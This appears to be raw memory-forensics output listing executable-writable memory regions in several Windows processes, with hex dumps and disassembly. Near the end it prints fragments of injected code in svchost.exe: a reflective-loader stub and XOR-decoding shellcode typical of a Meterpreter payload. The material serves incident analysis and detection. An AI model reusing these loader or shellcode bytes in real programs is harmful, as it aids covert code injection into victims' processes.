Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000029aee5c0000 00 00 00 00 00 00 00 00 19 8e 3d 68 df b5 00 01 ..........=h....
0x0000029aee5c0010 ee ff ee ff 02 00 00 00 20 01 5c ee 9a 02 00 00 ..........\.....
0x0000029aee5c0020 20 01 5c ee 9a 02 00 00 00 00 5c ee 9a 02 00 00 ..\.......\.....
0x0000029aee5c0030 00 00 5c ee 9a 02 00 00 0f 00 00 00 00 00 00 00 ..\.............
0x00000000ee5c0000 0000 ADD [EAX], AL
0x00000000ee5c0002 0000 ADD [EAX], AL
0x00000000ee5c0004 0000 ADD [EAX], AL
0x00000000ee5c0006 0000 ADD [EAX], AL
0x00000000ee5c0008 198e3d68dfb5 SBB [ESI-0x4a2097c3], ECX
0x00000000ee5c000e 0001 ADD [ECX], AL
0x00000000ee5c0010 ee OUT DX, AL
0x00000000ee5c0011 ff DB 0xff
0x00000000ee5c0012 ee OUT DX, AL
0x00000000ee5c0013 ff02 INC DWORD [EDX]
0x00000000ee5c0015 0000 ADD [EAX], AL
0x00000000ee5c0017 0020 ADD [EAX], AH
0x00000000ee5c0019 015cee9a ADD [ESI+EBP*8-0x66], EBX
0x00000000ee5c001d 0200 ADD AL, [EAX]
0x00000000ee5c001f 0020 ADD [EAX], AH
0x00000000ee5c0021 015cee9a ADD [ESI+EBP*8-0x66], EBX
0x00000000ee5c0025 0200 ADD AL, [EAX]
0x00000000ee5c0027 0000 ADD [EAX], AL
0x00000000ee5c0029 005cee9a ADD [ESI+EBP*8-0x66], BL
0x00000000ee5c002d 0200 ADD AL, [EAX]
0x00000000ee5c002f 0000 ADD [EAX], AL
0x00000000ee5c0031 005cee9a ADD [ESI+EBP*8-0x66], BL
0x00000000ee5c0035 0200 ADD AL, [EAX]
0x00000000ee5c0037 000f ADD [EDI], CL
0x00000000ee5c0039 0000 ADD [EAX], AL
0x00000000ee5c003b 0000 ADD [EAX], AL
0x00000000ee5c003d 0000 ADD [EAX], AL
0x00000000ee5c003f 00 DB 0x0
Process: ServerManager. Pid: 2552 Address: 0x29af0c90000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000029af0c90000 00 00 00 00 00 00 00 00 30 44 5c ee 9a 02 00 00 ........0D\.....
0x0000029af0c90010 30 44 5c ee 9a 02 00 00 00 00 5c ee 9a 02 00 00 0D\.......\.....
0x0000029af0c90020 40 0e c9 f0 9a 02 00 00 00 10 c9 f0 9a 02 00 00 @...............
0x0000029af0c90030 00 a0 ca f0 9a 02 00 00 04 00 00 00 01 00 00 00 ................
0x00000000f0c90000 0000 ADD [EAX], AL
0x00000000f0c90002 0000 ADD [EAX], AL
0x00000000f0c90004 0000 ADD [EAX], AL
0x00000000f0c90006 0000 ADD [EAX], AL
0x00000000f0c90008 30445cee XOR [ESP+EBX*2-0x12], AL
0x00000000f0c9000c 9a02000030445c CALL FAR 0x5c44:0x30000002
0x00000000f0c90013 ee OUT DX, AL
0x00000000f0c90014 9a02000000005c CALL FAR 0x5c00:0x2
0x00000000f0c9001b ee OUT DX, AL
0x00000000f0c9001c 9a020000400ec9 CALL FAR 0xc90e:0x40000002
0x00000000f0c90023 f09a0200000010c9 CALL FAR 0xc910:0x2
0x00000000f0c9002b f09a02000000a0ca CALL FAR 0xcaa0:0x2
0x00000000f0c90033 f09a020000040000 CALL FAR 0x0:0x4000002
0x00000000f0c9003b 0001 ADD [ECX], AL
0x00000000f0c9003d 0000 ADD [EAX], AL
0x00000000f0c9003f 00 DB 0x0
Process: ServerManager. Pid: 2552 Address: 0x7ff5ff390000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00007ff5ff390000 d8 ff ff ff ff ff ff ff 08 00 00 00 00 00 00 00 ................
0x00007ff5ff390010 01 00 00 00 00 00 00 00 00 02 0e 03 38 00 00 00 ............8...
0x00007ff5ff390020 68 41 bf 07 0c 00 00 00 98 1c c6 d0 fc 7f 00 00 hA..............
0x00007ff5ff390030 00 10 5e d0 fc 7f 00 00 f0 77 69 d0 fc 7f 00 00 ..^......wi.....
0x00000000ff390000 d8ff FDIVR ST0, ST7
0x00000000ff390002 ff DB 0xff
0x00000000ff390003 ff DB 0xff
0x00000000ff390004 ff DB 0xff
0x00000000ff390005 ff DB 0xff
0x00000000ff390006 ff DB 0xff
0x00000000ff390007 ff08 DEC DWORD [EAX]
0x00000000ff390009 0000 ADD [EAX], AL
0x00000000ff39000b 0000 ADD [EAX], AL
0x00000000ff39000d 0000 ADD [EAX], AL
0x00000000ff39000f 0001 ADD [ECX], AL
0x00000000ff390011 0000 ADD [EAX], AL
0x00000000ff390013 0000 ADD [EAX], AL
0x00000000ff390015 0000 ADD [EAX], AL
0x00000000ff390017 0000 ADD [EAX], AL
0x00000000ff390019 020e ADD CL, [ESI]
0x00000000ff39001b 0338 ADD EDI, [EAX]
0x00000000ff39001d 0000 ADD [EAX], AL
0x00000000ff39001f 006841 ADD [EAX+0x41], CH
0x00000000ff390022 bf070c0000 MOV EDI, 0xc07
0x00000000ff390027 00981cc6d0fc ADD [EAX-0x32f39e4], BL
0x00000000ff39002d 7f00 JG 0xff39002f
0x00000000ff39002f 0000 ADD [EAX], AL
0x00000000ff390031 105ed0 ADC [ESI-0x30], BL
0x00000000ff390034 fc CLD
0x00000000ff390035 7f00 JG 0xff390037
0x00000000ff390037 00f0 ADD AL, DH
0x00000000ff390039 7769 JA 0xff3900a4
0x00000000ff39003b d0fc SAR AH, 0x1
0x00000000ff39003d 7f00 JG 0xff39003f
0x00000000ff39003f 00 DB 0x0
Process: ServerManager. Pid: 2552 Address: 0x7ff5ff380000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00007ff5ff380000 00 00 00 00 00 00 00 00 78 0d 00 00 00 00 00 00 ........x.......
0x00007ff5ff380010 0c 00 00 00 49 c7 c2 00 00 00 00 48 b8 c0 48 ad ....I......H..H.
0x00007ff5ff380020 d1 fc 7f 00 00 ff e0 49 c7 c2 01 00 00 00 48 b8 .......I......H.
0x00007ff5ff380030 c0 48 ad d1 fc 7f 00 00 ff e0 49 c7 c2 02 00 00 .H........I.....
0x00000000ff380000 0000 ADD [EAX], AL
0x00000000ff380002 0000 ADD [EAX], AL
0x00000000ff380004 0000 ADD [EAX], AL
0x00000000ff380006 0000 ADD [EAX], AL
0x00000000ff380008 780d JS 0xff380017
0x00000000ff38000a 0000 ADD [EAX], AL
0x00000000ff38000c 0000 ADD [EAX], AL
0x00000000ff38000e 0000 ADD [EAX], AL
0x00000000ff380010 0c00 OR AL, 0x0
0x00000000ff380012 0000 ADD [EAX], AL
0x00000000ff380014 49 DEC ECX
0x00000000ff380015 c7c200000000 MOV EDX, 0x0
0x00000000ff38001b 48 DEC EAX
0x00000000ff38001c b8c048add1 MOV EAX, 0xd1ad48c0
0x00000000ff380021 fc CLD
0x00000000ff380022 7f00 JG 0xff380024
0x00000000ff380024 00ff ADD BH, BH
0x00000000ff380026 e049 LOOPNZ 0xff380071
0x00000000ff380028 c7c201000000 MOV EDX, 0x1
0x00000000ff38002e 48 DEC EAX
0x00000000ff38002f b8c048add1 MOV EAX, 0xd1ad48c0
0x00000000ff380034 fc CLD
0x00000000ff380035 7f00 JG 0xff380037
0x00000000ff380037 00ff ADD BH, BH
0x00000000ff380039 e049 LOOPNZ 0xff380084
0x00000000ff38003b c7 DB 0xc7
0x00000000ff38003c c20200 RET 0x2
0x00000000ff38003f 00 DB 0x0
Process: powershell.exe Pid: 4344 Address: 0x21da7ae0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000021da7ae0000 00 00 00 00 00 00 00 00 87 dc b6 2e 69 3f 00 01 ............i?..
0x0000021da7ae0010 ee ff ee ff 02 00 00 00 20 01 ae a7 1d 02 00 00 ................
0x0000021da7ae0020 20 01 ae a7 1d 02 00 00 00 00 ae a7 1d 02 00 00 ................
0x0000021da7ae0030 00 00 ae a7 1d 02 00 00 0f 00 00 00 00 00 00 00 ................
0x00000000a7ae0000 0000 ADD [EAX], AL
0x00000000a7ae0002 0000 ADD [EAX], AL
0x00000000a7ae0004 0000 ADD [EAX], AL
0x00000000a7ae0006 0000 ADD [EAX], AL
0x00000000a7ae0008 87dc XCHG ESP, EBX
0x00000000a7ae000a b62e MOV DH, 0x2e
0x00000000a7ae000c 693f0001eeff IMUL EDI, [EDI], 0xffee0100
0x00000000a7ae0012 ee OUT DX, AL
0x00000000a7ae0013 ff02 INC DWORD [EDX]
0x00000000a7ae0015 0000 ADD [EAX], AL
0x00000000a7ae0017 0020 ADD [EAX], AH
0x00000000a7ae0019 01aea71d0200 ADD [ESI+0x21da7], EBP
0x00000000a7ae001f 0020 ADD [EAX], AH
0x00000000a7ae0021 01aea71d0200 ADD [ESI+0x21da7], EBP
0x00000000a7ae0027 0000 ADD [EAX], AL
0x00000000a7ae0029 00aea71d0200 ADD [ESI+0x21da7], CH
0x00000000a7ae002f 0000 ADD [EAX], AL
0x00000000a7ae0031 00aea71d0200 ADD [ESI+0x21da7], CH
0x00000000a7ae0037 000f ADD [EDI], CL
0x00000000a7ae0039 0000 ADD [EAX], AL
0x00000000a7ae003b 0000 ADD [EAX], AL
0x00000000a7ae003d 0000 ADD [EAX], AL
0x00000000a7ae003f 00 DB 0x0
Process: powershell.exe Pid: 4344 Address: 0x21da7bf0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000021da7bf0000 00 00 00 00 00 00 00 00 70 bd bf 7d a4 5a 00 01 ........p..}.Z..
0x0000021da7bf0010 ee ff ee ff 02 00 00 00 20 01 bf a7 1d 02 00 00 ................
0x0000021da7bf0020 20 01 bf a7 1d 02 00 00 00 00 bf a7 1d 02 00 00 ................
0x0000021da7bf0030 00 00 bf a7 1d 02 00 00 0f 00 00 00 00 00 00 00 ................
0x00000000a7bf0000 0000 ADD [EAX], AL
0x00000000a7bf0002 0000 ADD [EAX], AL
0x00000000a7bf0004 0000 ADD [EAX], AL
0x00000000a7bf0006 0000 ADD [EAX], AL
0x00000000a7bf0008 70bd JO 0xa7beffc7
0x00000000a7bf000a bf7da45a00 MOV EDI, 0x5aa47d
0x00000000a7bf000f 01ee ADD ESI, EBP
0x00000000a7bf0011 ff DB 0xff
0x00000000a7bf0012 ee OUT DX, AL
0x00000000a7bf0013 ff02 INC DWORD [EDX]
0x00000000a7bf0015 0000 ADD [EAX], AL
0x00000000a7bf0017 0020 ADD [EAX], AH
0x00000000a7bf0019 01bfa71d0200 ADD [EDI+0x21da7], EDI
0x00000000a7bf001f 0020 ADD [EAX], AH
0x00000000a7bf0021 01bfa71d0200 ADD [EDI+0x21da7], EDI
0x00000000a7bf0027 0000 ADD [EAX], AL
0x00000000a7bf0029 00bfa71d0200 ADD [EDI+0x21da7], BH
0x00000000a7bf002f 0000 ADD [EAX], AL
0x00000000a7bf0031 00bfa71d0200 ADD [EDI+0x21da7], BH
0x00000000a7bf0037 000f ADD [EDI], CL
0x00000000a7bf0039 0000 ADD [EAX], AL
0x00000000a7bf003b 0000 ADD [EAX], AL
0x00000000a7bf003d 0000 ADD [EAX], AL
0x00000000a7bf003f 00 DB 0x0
Process: powershell.exe Pid: 4344 Address: 0x21da7ba0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000021da7ba0000 00 00 00 00 00 00 00 00 00 7a ae a7 1d 02 00 00 .........z......
0x0000021da7ba0010 00 7a ae a7 1d 02 00 00 00 00 ae a7 1d 02 00 00 .z..............
0x0000021da7ba0020 40 0e ba a7 1d 02 00 00 00 10 ba a7 1d 02 00 00 @...............
0x0000021da7ba0030 00 a0 bb a7 1d 02 00 00 01 00 00 00 00 00 00 00 ................
0x00000000a7ba0000 0000 ADD [EAX], AL
0x00000000a7ba0002 0000 ADD [EAX], AL
0x00000000a7ba0004 0000 ADD [EAX], AL
0x00000000a7ba0006 0000 ADD [EAX], AL
0x00000000a7ba0008 007aae ADD [EDX-0x52], BH
0x00000000a7ba000b a7 CMPSD
0x00000000a7ba000c 1d02000000 SBB EAX, 0x2
0x00000000a7ba0011 7aae JP 0xa7b9ffc1
0x00000000a7ba0013 a7 CMPSD
0x00000000a7ba0014 1d02000000 SBB EAX, 0x2
0x00000000a7ba0019 00aea71d0200 ADD [ESI+0x21da7], CH
0x00000000a7ba001f 00400e ADD [EAX+0xe], AL
0x00000000a7ba0022 baa71d0200 MOV EDX, 0x21da7
0x00000000a7ba0027 0000 ADD [EAX], AL
0x00000000a7ba0029 10baa71d0200 ADC [EDX+0x21da7], BH
0x00000000a7ba002f 0000 ADD [EAX], AL
0x00000000a7ba0031 a0bba71d02 MOV AL, [0x21da7bb]
0x00000000a7ba0036 0000 ADD [EAX], AL
0x00000000a7ba0038 0100 ADD [EAX], EAX
0x00000000a7ba003a 0000 ADD [EAX], AL
0x00000000a7ba003c 0000 ADD [EAX], AL
0x00000000a7ba003e 0000 ADD [EAX], AL
Process: powershell.exe Pid: 4344 Address: 0x7ff664960000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00007ff664960000 00 00 00 00 00 00 00 00 78 0d 00 00 00 00 00 00 ........x.......
0x00007ff664960010 45 00 00 00 49 c7 c2 00 00 00 00 48 b8 c0 48 ad E...I......H..H.
0x00007ff664960020 d1 fc 7f 00 00 ff e0 49 c7 c2 01 00 00 00 48 b8 .......I......H.
0x00007ff664960030 c0 48 ad d1 fc 7f 00 00 ff e0 49 c7 c2 02 00 00 .H........I.....
0x0000000064960000 0000 ADD [EAX], AL
0x0000000064960002 0000 ADD [EAX], AL
0x0000000064960004 0000 ADD [EAX], AL
0x0000000064960006 0000 ADD [EAX], AL
0x0000000064960008 780d JS 0x64960017
0x000000006496000a 0000 ADD [EAX], AL
0x000000006496000c 0000 ADD [EAX], AL
0x000000006496000e 0000 ADD [EAX], AL
0x0000000064960010 45 INC EBP
0x0000000064960011 0000 ADD [EAX], AL
0x0000000064960013 0049c7 ADD [ECX-0x39], CL
0x0000000064960016 c20000 RET 0x0
0x0000000064960019 0000 ADD [EAX], AL
0x000000006496001b 48 DEC EAX
0x000000006496001c b8c048add1 MOV EAX, 0xd1ad48c0
0x0000000064960021 fc CLD
0x0000000064960022 7f00 JG 0x64960024
0x0000000064960024 00ff ADD BH, BH
0x0000000064960026 e049 LOOPNZ 0x64960071
0x0000000064960028 c7c201000000 MOV EDX, 0x1
0x000000006496002e 48 DEC EAX
0x000000006496002f b8c048add1 MOV EAX, 0xd1ad48c0
0x0000000064960034 fc CLD
0x0000000064960035 7f00 JG 0x64960037
0x0000000064960037 00ff ADD BH, BH
0x0000000064960039 e049 LOOPNZ 0x64960084
0x000000006496003b c7 DB 0xc7
0x000000006496003c c20200 RET 0x2
0x000000006496003f 00 DB 0x0
Process: powershell.exe Pid: 4344 Address: 0x7ff664970000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00007ff664970000 d8 ff ff ff ff ff ff ff 08 00 00 00 00 00 00 00 ................
0x00007ff664970010 01 00 00 00 00 00 00 00 00 02 0e 03 38 00 00 00 ............8...
0x00007ff664970020 68 41 bf 07 45 00 00 00 98 1c c6 d0 fc 7f 00 00 hA..E...........
0x00007ff664970030 00 10 5e d0 fc 7f 00 00 f0 77 69 d0 fc 7f 00 00 ..^......wi.....
0x0000000064970000 d8ff FDIVR ST0, ST7
0x0000000064970002 ff DB 0xff
0x0000000064970003 ff DB 0xff
0x0000000064970004 ff DB 0xff
0x0000000064970005 ff DB 0xff
0x0000000064970006 ff DB 0xff
0x0000000064970007 ff08 DEC DWORD [EAX]
0x0000000064970009 0000 ADD [EAX], AL
0x000000006497000b 0000 ADD [EAX], AL
0x000000006497000d 0000 ADD [EAX], AL
0x000000006497000f 0001 ADD [ECX], AL
0x0000000064970011 0000 ADD [EAX], AL
0x0000000064970013 0000 ADD [EAX], AL
0x0000000064970015 0000 ADD [EAX], AL
0x0000000064970017 0000 ADD [EAX], AL
0x0000000064970019 020e ADD CL, [ESI]
0x000000006497001b 0338 ADD EDI, [EAX]
0x000000006497001d 0000 ADD [EAX], AL
0x000000006497001f 006841 ADD [EAX+0x41], CH
0x0000000064970022 bf07450000 MOV EDI, 0x4507
0x0000000064970027 00981cc6d0fc ADD [EAX-0x32f39e4], BL
0x000000006497002d 7f00 JG 0x6497002f
0x000000006497002f 0000 ADD [EAX], AL
0x0000000064970031 105ed0 ADC [ESI-0x30], BL
0x0000000064970034 fc CLD
0x0000000064970035 7f00 JG 0x64970037
0x0000000064970037 00f0 ADD AL, DH
0x0000000064970039 7769 JA 0x649700a4
0x000000006497003b d0fc SAR AH, 0x1
0x000000006497003d 7f00 JG 0x6497003f
0x000000006497003f 00 DB 0x0
Process: mmc.exe Pid: 2688 Address: 0x4d70000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000000004d70000 00 00 00 00 00 00 00 00 40 98 3f 1d 00 00 00 00 ........@.?.....
0x0000000004d70010 40 98 3f 1d 00 00 00 00 00 00 3f 1d 00 00 00 00 @.?.......?.....
0x0000000004d70020 40 0e d7 04 00 00 00 00 00 10 d7 04 00 00 00 00 @...............
0x0000000004d70030 00 a0 d8 04 00 00 00 00 04 00 00 00 00 00 00 00 ................
0x0000000004d70000 0000 ADD [EAX], AL
0x0000000004d70002 0000 ADD [EAX], AL
0x0000000004d70004 0000 ADD [EAX], AL
0x0000000004d70006 0000 ADD [EAX], AL
0x0000000004d70008 40 INC EAX
0x0000000004d70009 98 CWDE
0x0000000004d7000a 3f AAS
0x0000000004d7000b 1d00000000 SBB EAX, 0x0
0x0000000004d70010 40 INC EAX
0x0000000004d70011 98 CWDE
0x0000000004d70012 3f AAS
0x0000000004d70013 1d00000000 SBB EAX, 0x0
0x0000000004d70018 0000 ADD [EAX], AL
0x0000000004d7001a 3f AAS
0x0000000004d7001b 1d00000000 SBB EAX, 0x0
0x0000000004d70020 40 INC EAX
0x0000000004d70021 0e PUSH CS
0x0000000004d70022 d7 XLAT BYTE [EBX+AL]
0x0000000004d70023 0400 ADD AL, 0x0
0x0000000004d70025 0000 ADD [EAX], AL
0x0000000004d70027 0000 ADD [EAX], AL
0x0000000004d70029 10d7 ADC BH, DL
0x0000000004d7002b 0400 ADD AL, 0x0
0x0000000004d7002d 0000 ADD [EAX], AL
0x0000000004d7002f 0000 ADD [EAX], AL
0x0000000004d70031 a0d8040000 MOV AL, [0x4d8]
0x0000000004d70036 0000 ADD [EAX], AL
0x0000000004d70038 0400 ADD AL, 0x0
0x0000000004d7003a 0000 ADD [EAX], AL
0x0000000004d7003c 0000 ADD [EAX], AL
0x0000000004d7003e 0000 ADD [EAX], AL
Process: mmc.exe Pid: 2688 Address: 0x50a0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00000000050a0000 00 00 00 00 00 00 00 00 a8 60 57 85 e4 a2 00 01 .........`W.....
0x00000000050a0010 ee ff ee ff 02 00 00 00 20 01 0a 05 00 00 00 00 ................
0x00000000050a0020 20 01 0a 05 00 00 00 00 00 00 0a 05 00 00 00 00 ................
0x00000000050a0030 00 00 0a 05 00 00 00 00 0f 00 00 00 00 00 00 00 ................
0x00000000050a0000 0000 ADD [EAX], AL
0x00000000050a0002 0000 ADD [EAX], AL
0x00000000050a0004 0000 ADD [EAX], AL
0x00000000050a0006 0000 ADD [EAX], AL
0x00000000050a0008 a860 TEST AL, 0x60
0x00000000050a000a 57 PUSH EDI
0x00000000050a000b 85e4 TEST ESP, ESP
0x00000000050a000d a20001eeff MOV [0xffee0100], AL
0x00000000050a0012 ee OUT DX, AL
0x00000000050a0013 ff02 INC DWORD [EDX]
0x00000000050a0015 0000 ADD [EAX], AL
0x00000000050a0017 0020 ADD [EAX], AH
0x00000000050a0019 010a ADD [EDX], ECX
0x00000000050a001b 0500000000 ADD EAX, 0x0
0x00000000050a0020 2001 AND [ECX], AL
0x00000000050a0022 0a0500000000 OR AL, [0x0]
0x00000000050a0028 0000 ADD [EAX], AL
0x00000000050a002a 0a0500000000 OR AL, [0x0]
0x00000000050a0030 0000 ADD [EAX], AL
0x00000000050a0032 0a0500000000 OR AL, [0x0]
0x00000000050a0038 0f0000 SLDT DWORD [EAX]
0x00000000050a003b 0000 ADD [EAX], AL
0x00000000050a003d 0000 ADD [EAX], AL
0x00000000050a003f 00 DB 0x0
Process: mmc.exe Pid: 2688 Address: 0x1d3f0000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x000000001d3f0000 00 00 00 00 00 00 00 00 76 7e 1c 33 fb 46 00 01 ........v~.3.F..
0x000000001d3f0010 ee ff ee ff 02 00 00 00 20 01 3f 1d 00 00 00 00 ..........?.....
0x000000001d3f0020 20 01 3f 1d 00 00 00 00 00 00 3f 1d 00 00 00 00 ..?.......?.....
0x000000001d3f0030 00 00 3f 1d 00 00 00 00 0f 00 00 00 00 00 00 00 ..?.............
0x000000001d3f0000 0000 ADD [EAX], AL
0x000000001d3f0002 0000 ADD [EAX], AL
0x000000001d3f0004 0000 ADD [EAX], AL
0x000000001d3f0006 0000 ADD [EAX], AL
0x000000001d3f0008 767e JBE 0x1d3f0088
0x000000001d3f000a 1c33 SBB AL, 0x33
0x000000001d3f000c fb STI
0x000000001d3f000d 46 INC ESI
0x000000001d3f000e 0001 ADD [ECX], AL
0x000000001d3f0010 ee OUT DX, AL
0x000000001d3f0011 ff DB 0xff
0x000000001d3f0012 ee OUT DX, AL
0x000000001d3f0013 ff02 INC DWORD [EDX]
0x000000001d3f0015 0000 ADD [EAX], AL
0x000000001d3f0017 0020 ADD [EAX], AH
0x000000001d3f0019 013f ADD [EDI], EDI
0x000000001d3f001b 1d00000000 SBB EAX, 0x0
0x000000001d3f0020 2001 AND [ECX], AL
0x000000001d3f0022 3f AAS
0x000000001d3f0023 1d00000000 SBB EAX, 0x0
0x000000001d3f0028 0000 ADD [EAX], AL
0x000000001d3f002a 3f AAS
0x000000001d3f002b 1d00000000 SBB EAX, 0x0
0x000000001d3f0030 0000 ADD [EAX], AL
0x000000001d3f0032 3f AAS
0x000000001d3f0033 1d00000000 SBB EAX, 0x0
0x000000001d3f0038 0f0000 SLDT DWORD [EAX]
0x000000001d3f003b 0000 ADD [EAX], AL
0x000000001d3f003d 0000 ADD [EAX], AL
0x000000001d3f003f 00 DB 0x0
Process: mmc.exe Pid: 2688 Address: 0x7ff7e2320000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00007ff7e2320000 d8 ff ff ff ff ff ff ff 08 00 00 00 00 00 00 00 ................
0x00007ff7e2320010 01 00 00 00 00 00 00 00 00 02 0e 03 38 00 00 00 ............8...
0x00007ff7e2320020 68 41 bf 07 45 00 00 00 98 1c c6 d0 fc 7f 00 00 hA..E...........
0x00007ff7e2320030 00 10 5e d0 fc 7f 00 00 f0 77 69 d0 fc 7f 00 00 ..^......wi.....
0x00000000e2320000 d8ff FDIVR ST0, ST7
0x00000000e2320002 ff DB 0xff
0x00000000e2320003 ff DB 0xff
0x00000000e2320004 ff DB 0xff
0x00000000e2320005 ff DB 0xff
0x00000000e2320006 ff DB 0xff
0x00000000e2320007 ff08 DEC DWORD [EAX]
0x00000000e2320009 0000 ADD [EAX], AL
0x00000000e232000b 0000 ADD [EAX], AL
0x00000000e232000d 0000 ADD [EAX], AL
0x00000000e232000f 0001 ADD [ECX], AL
0x00000000e2320011 0000 ADD [EAX], AL
0x00000000e2320013 0000 ADD [EAX], AL
0x00000000e2320015 0000 ADD [EAX], AL
0x00000000e2320017 0000 ADD [EAX], AL
0x00000000e2320019 020e ADD CL, [ESI]
0x00000000e232001b 0338 ADD EDI, [EAX]
0x00000000e232001d 0000 ADD [EAX], AL
0x00000000e232001f 006841 ADD [EAX+0x41], CH
0x00000000e2320022 bf07450000 MOV EDI, 0x4507
0x00000000e2320027 00981cc6d0fc ADD [EAX-0x32f39e4], BL
0x00000000e232002d 7f00 JG 0xe232002f
0x00000000e232002f 0000 ADD [EAX], AL
0x00000000e2320031 105ed0 ADC [ESI-0x30], BL
0x00000000e2320034 fc CLD
0x00000000e2320035 7f00 JG 0xe2320037
0x00000000e2320037 00f0 ADD AL, DH
0x00000000e2320039 7769 JA 0xe23200a4
0x00000000e232003b d0fc SAR AH, 0x1
0x00000000e232003d 7f00 JG 0xe232003f
0x00000000e232003f 00 DB 0x0
Process: mmc.exe Pid: 2688 Address: 0x7ff7e2310000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x00007ff7e2310000 00 00 00 00 00 00 00 00 78 0d 00 00 00 00 00 00 ........x.......
0x00007ff7e2310010 45 00 00 00 49 c7 c2 00 00 00 00 48 b8 c0 48 ad E...I......H..H.
0x00007ff7e2310020 d1 fc 7f 00 00 ff e0 49 c7 c2 01 00 00 00 48 b8 .......I......H.
0x00007ff7e2310030 c0 48 ad d1 fc 7f 00 00 ff e0 49 c7 c2 02 00 00 .H........I.....
0x00000000e2310000 0000 ADD [EAX], AL
0x00000000e2310002 0000 ADD [EAX], AL
0x00000000e2310004 0000 ADD [EAX], AL
0x00000000e2310006 0000 ADD [EAX], AL
0x00000000e2310008 780d JS 0xe2310017
0x00000000e231000a 0000 ADD [EAX], AL
0x00000000e231000c 0000 ADD [EAX], AL
0x00000000e231000e 0000 ADD [EAX], AL
0x00000000e2310010 45 INC EBP
0x00000000e2310011 0000 ADD [EAX], AL
0x00000000e2310013 0049c7 ADD [ECX-0x39], CL
0x00000000e2310016 c20000 RET 0x0
0x00000000e2310019 0000 ADD [EAX], AL
0x00000000e231001b 48 DEC EAX
0x00000000e231001c b8c048add1 MOV EAX, 0xd1ad48c0
0x00000000e2310021 fc CLD
0x00000000e2310022 7f00 JG 0xe2310024
0x00000000e2310024 00ff ADD BH, BH
0x00000000e2310026 e049 LOOPNZ 0xe2310071
0x00000000e2310028 c7c201000000 MOV EDX, 0x1
0x00000000e231002e 48 DEC EAX
0x00000000e231002f b8c048add1 MOV EAX, 0xd1ad48c0
0x00000000e2310034 fc CLD
0x00000000e2310035 7f00 JG 0xe2310037
0x00000000e2310037 00ff ADD BH, BH
0x00000000e2310039 e049 LOOPNZ 0xe2310084
0x00000000e231003b c7 DB 0xc7
0x00000000e231003c c20200 RET 0x2
0x00000000e231003f 00 DB 0x0
Process: svchost.exe Pid: 1488 Address: 0xb30000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000000000b30000 4d 5a 41 52 55 48 89 e5 48 81 ec 20 00 00 00 48 MZARUH..H......H
0x0000000000b30010 8d 1d ea ff ff ff 48 89 df 48 81 c3 f4 63 01 00 ......H..H...c..
0x0000000000b30020 ff d3 41 b8 f0 b5 a2 56 68 04 00 00 00 5a 48 89 ..A....Vh....ZH.
0x0000000000b30030 f9 ff d0 00 00 00 00 00 00 00 00 00 f8 00 00 00 ................
0x0000000000b30000 4d DEC EBP
0x0000000000b30001 5a POP EDX
0x0000000000b30002 41 INC ECX
0x0000000000b30003 52 PUSH EDX
0x0000000000b30004 55 PUSH EBP
0x0000000000b30005 48 DEC EAX
0x0000000000b30006 89e5 MOV EBP, ESP
0x0000000000b30008 48 DEC EAX
0x0000000000b30009 81ec20000000 SUB ESP, 0x20
0x0000000000b3000f 48 DEC EAX
0x0000000000b30010 8d1deaffffff LEA EBX, [0xffffffea]
0x0000000000b30016 48 DEC EAX
0x0000000000b30017 89df MOV EDI, EBX
0x0000000000b30019 48 DEC EAX
0x0000000000b3001a 81c3f4630100 ADD EBX, 0x163f4
0x0000000000b30020 ffd3 CALL EBX
0x0000000000b30022 41 INC ECX
0x0000000000b30023 b8f0b5a256 MOV EAX, 0x56a2b5f0
0x0000000000b30028 6804000000 PUSH DWORD 0x4
0x0000000000b3002d 5a POP EDX
0x0000000000b3002e 48 DEC EAX
0x0000000000b3002f 89f9 MOV ECX, EDI
0x0000000000b30031 ffd0 CALL EAX
0x0000000000b30033 0000 ADD [EAX], AL
0x0000000000b30035 0000 ADD [EAX], AL
0x0000000000b30037 0000 ADD [EAX], AL
0x0000000000b30039 0000 ADD [EAX], AL
0x0000000000b3003b 00f8 ADD AL, BH
0x0000000000b3003d 0000 ADD [EAX], AL
0x0000000000b3003f 00 DB 0x0
Process: svchost.exe Pid: 1488 Address: 0x3160000
Vad Tag: VadS Protection: PAGE_EXECUTE_READWRITE
Flags: PrivateMemory: 1, Protection: 6
0x0000000003160000 fc 48 83 e4 f0 eb 33 5d 8b 45 00 48 83 c5 04 8b .H....3].E.H....
0x0000000003160010 4d 00 31 c1 48 83 c5 04 55 8b 55 00 31 c2 89 55 M.1.H...U.U.1..U
0x0000000003160020 00 31 d0 48 83 c5 04 83 e9 04 31 d2 39 d1 74 02 .1.H......1.9.t.
0x0000000003160030 eb e7 58 fc 48 83 e4 f0 ff d0 e8 c8 ff ff ff 3d ..X.H..........=
0x0000000003160000 fc CLD
0x0000000003160001 48 DEC EAX
0x0000000003160002 83e4f0 AND ESP, -0x10
0x0000000003160005 eb33 JMP 0x316003a
0x0000000003160007 5d POP EBP
0x0000000003160008 8b4500 MOV EAX, [EBP+0x0]
0x000000000316000b 48 DEC EAX
